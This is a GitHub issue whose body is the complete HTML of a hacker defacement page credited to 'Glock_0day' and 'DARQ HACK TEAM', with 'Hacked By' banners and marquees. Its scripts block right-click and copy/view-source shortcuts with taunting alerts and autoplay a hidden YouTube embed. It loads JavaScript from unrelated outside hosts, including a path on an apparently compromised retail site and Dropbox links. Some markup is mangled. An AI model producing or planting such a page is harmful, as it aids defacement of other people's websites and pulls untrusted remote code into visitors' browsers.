### ISSUE TITLE
zaza

### ISSUE THREAD

**Issue by glock-0day** [glock-0day/sasa#2]
<html>
<head>
<title>DARQNİGHTGECE</title>
<me-ta name="author"	content="DARQ HACK TEAM">
<me-ta name="description"	content="Have a Nice Day Admin.">
<me-ta property="og:image"	content="https://c4.wallpaperflare.com/wallpaper/948/51/711/scary-face-depressing-dark-teeth-wallpaper-preview.jpg">
<me-ta property="og:image:width"	content="1200"/>
<me-ta property="og:image:height"	content="630"/>
<link href='http://fonts.googleapis.com/css?family=Orbitron:700|Gruppo' rel='stylesheet' type='text/css'>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="http://www.nycfragrance.com/csvcategoryimportver1.0.3/system/css/layout/js/crazyIntro.js"></script> 
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/27qrxwqx674059d/jquery-1.11.1.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/yzmc24cuj9dl8ih/bootstrap.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/9arv5tpx9yucnlf/jquery.cycle.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/is1vrbl5jmdsel9/jquery.backstretch.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/geo5dr110vx63cl/scripts.js"></script>
<script type="text/javascript" src="http://smilenet4u.googlecode.com/files/TipingText.js"></script>

</head>
<script type="text/javascript">
var isNS = (navigator.appName == "tryshit") ? 1 : 0;
if(navigator.appName == "tryshit") doc-ument.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
return false;
}
function mousehandler(e){
var myevent = (isNS) ? e : event;
var eventbutton = (isNS) ? myevent.which : myevent.button;
if((eventbutton==2)||(eventbutton==3)) {
alert('Hacked By Glock_0day');
return false;
}
}
doc-ument.oncontextmenu = mischandler;
doc-ument.onmousedown = mousehandler;
doc-ument.onmouseup = mousehandler;
var isCtrl = false;
doc-ument.onkeyup=function(e)
{
if(e.which == 17)
isCtrl=false;
}
doc-ument.onkeydown=function(e)
{
if(e.which == 17)
isCtrl=true;
if(((e.which == 85) || (e.which == 117) || (e.which == 65) || (e.which == 97) || (e.which == 67) || (e.which == 99)) && isCtrl == true)
{
alert('Hacked By Darqnighgece');
return false;
}
}
</script>
<style>
body{
background-position:top center;
background-color:#000000;
margin:0px;
background-repeat:no-repeat;
font-family:'Orbitron', sans-serif;
color:#FFF;
width:100%;
height:100%;
}
pre{
font-family:'Orbitron',sans-serif;
}
#plate{
position: absolute;!important;
top:0!important;
left:0;
right:0;
width:100%;
height:100%;
z-index:-1!important;
margin:0;
padding:0;
position:fixed;
background-color:rgba(0, 0, 0, 0.18);
}
#xx{
font-size:55px;
text-shadow:0 0 5px #2C7DCD, 0 0 10px #298A9B, 0 0 15px #585E5E, 0 0 20px #4A4D4D, 0 0 30px #313232, 0 0 40px #333535, 0 0 55px #353736, 0 0 75px #2D4140;
}
.tae {
-webkit-animation-name: blinker;
-webkit-animation-duration: 1s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 1s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

animation-name: blinker;
animation-duration: 1s;
animation-timing-function: linear;
animation-iteration-count: infinite;
}
@-moz-keyframes blinker { 
0% { opacity: 1.0; }
50% { opacity: 0.0; }
100% { opacity: 1.0; }
}

@-webkit-keyframes blinker { 
0% { opacity: 1.0; }
50% { opacity: 0.0; }
100% { opacity: 1.0; }
}

@keyframes blinker { 
0% { opacity: 1.0; }
50% { opacity: 0.0; }
100% { opacity: 1.0; }
}
*.unselectable {
-moz-user-select: -moz-none;
-khtml-user-select: none;
-webkit-user-select: none;
-ms-user-select: none;
user-select: none;
}
#name{
color:rgb(76, 228, 240);
}
.message{
height:600px;
}
#as:hover{
color:transparent;
}
</style>
<body class="unselectable">
<script>
alert("HACKED BY GLOCK_0DAY");
<script type="text/javascript">

;(function(){

var msg = "https://c4.wallpaperflare.com/wallpaper/948/51/711/scary-face-depressing-dark-teeth-wallpaper-preview.jpg !";

var size = 24;

var circleY = 0.75; var circleX = 2;

var letter_spacing = 5;

var diameter = 10;

var rotation = 0.4;

var speed = 0.3;

if (!window.addEventListener && !window.attachEvent || !docu-ment.createElement) return;

msg = msg.split('');
var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
ymouse = a * circleY + 20, xmouse = a * circleX + 20, y = [], x = [], Y = [], X = [],
o = docu-ment.createElement('div'), oi = docu-ment.createElement('div'),
b = docu-ment.compatMode && docu-ment.compatMode != "BackCompat"? docu-ment.docu-mentElement : docu-ment.body,

mouse = function(e){
 e = e || window.event;
 ymouse = !isNaN(e.pageY)? e.pageY : e.clientY;
 xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; 
},

makecircle = function(){
 if(init.nopy){
  o.style.top = (b || docu-ment.body).scrollTop + 'px';
  o.style.left = (b || docu-ment.body).scrollLeft + 'px';
 };
 currStep -= rotation;
 for (var d, i = n; i > -1; --i){ 
  d = docu-ment.getElementById('iemsg' + i).style;
  d.top = Math.round(y[i] + a * Math.sin((currStep + i) / letter_spacing) * circleY - 15) + 'px';
  d.left = Math.round(x[i] + a * Math.cos((currStep + i) / letter_spacing) * circleX) + 'px';
 };
},

drag = function(){
 y[0] = Y[0] += (ymouse - Y[0]) * speed;
 x[0] = X[0] += (xmouse - 20 - X[0]) * speed;
 for (var i = n; i > 0; --i){
  y[i] = Y[i] += (y[i-1] - Y[i]) * speed;
  x[i] = X[i] += (x[i-1] - X[i]) * speed;
 };
 makecircle();
},

init = function(){ 
 if(!isNaN(window.pageYOffset)){
  ymouse += window.pageYOffset;
  xmouse += window.pageXOffset;
 } else init.nopy = true;
 for (var d, i = n; i > -1; --i){
  d = docu-ment.createElement('div'); d.id = 'iemsg' + i;
  d.style.height = d.style.width = a + 'px';
  d.appendChild(docu-ment.createTextNode(msg[i]));
  oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
 };
 o.appendChild(oi); docu-ment.body.appendChild(o);
 setInterval(drag, 25);
},

ascroll = function(){
 ymouse += window.pageYOffset;
 xmouse += window.pageXOffset;
 window.removeEventListener('scroll', ascroll, false);
};

o.id = 'outerCircleText'; o.style.fontSize = size + 'px';

if (window.addEventListener){
 window.addEventListener('load', init, false);
 doc-ument.addEventListener('mouseover', mouse, false);
 doc-ument.addEventListener('mousemove', mouse, false);
  if (/Apple/.test(navigator.vendor))
   window.addEventListener('scroll', ascroll, false);
}
else if (window.attachEvent){
 window.attachEvent('onload', init);
 docu-ment.attachEvent('onmousemove', mouse);
};

})();

</script>
<div id="plate">
<canvas height="100%" width="100%" id="gravity"></canvas> 
</div>
<center>
<pre>
</br><p id="xx">
<marquee direction=right>Hacked By DARQNİGHTGECE</marquee>
<marquee>
    Hacked By DARQNİGHTGECE</marquee>
<span style="font-size:30px;">GECE GELDDİİİİİİİ</span>
<script src="http://www.webkodu.com/kod-kaynak/wk-turk-bayragi-efekt.js"></script>
<script src="http://www.webkodu.com/kod-kaynak/wk-yesil-uc-hilal-efekt.js"></script>
<span style="font-size:20px;">Darqnightgece

+===========================================+
</span>
</p>
</pre>
</div>
<script type="text/javascript">
new TypingText(docu-ment.getElementById("xx"), 300, function(i){ var ar = new Array(""); return ar[i.length % ar.length]; });
TypingText.runAll();
</script>
<script language="JavaScript">
docu-ment.writeln('<iframe width="0" height="0" src="https://www.youtube.com/embed/yPsUxLLeV1E?autoplay=1&playlist=J33zSPl8eSU&loop=1" frameborder="0"></iframe>');
</script>
</center>
</body>
</html>
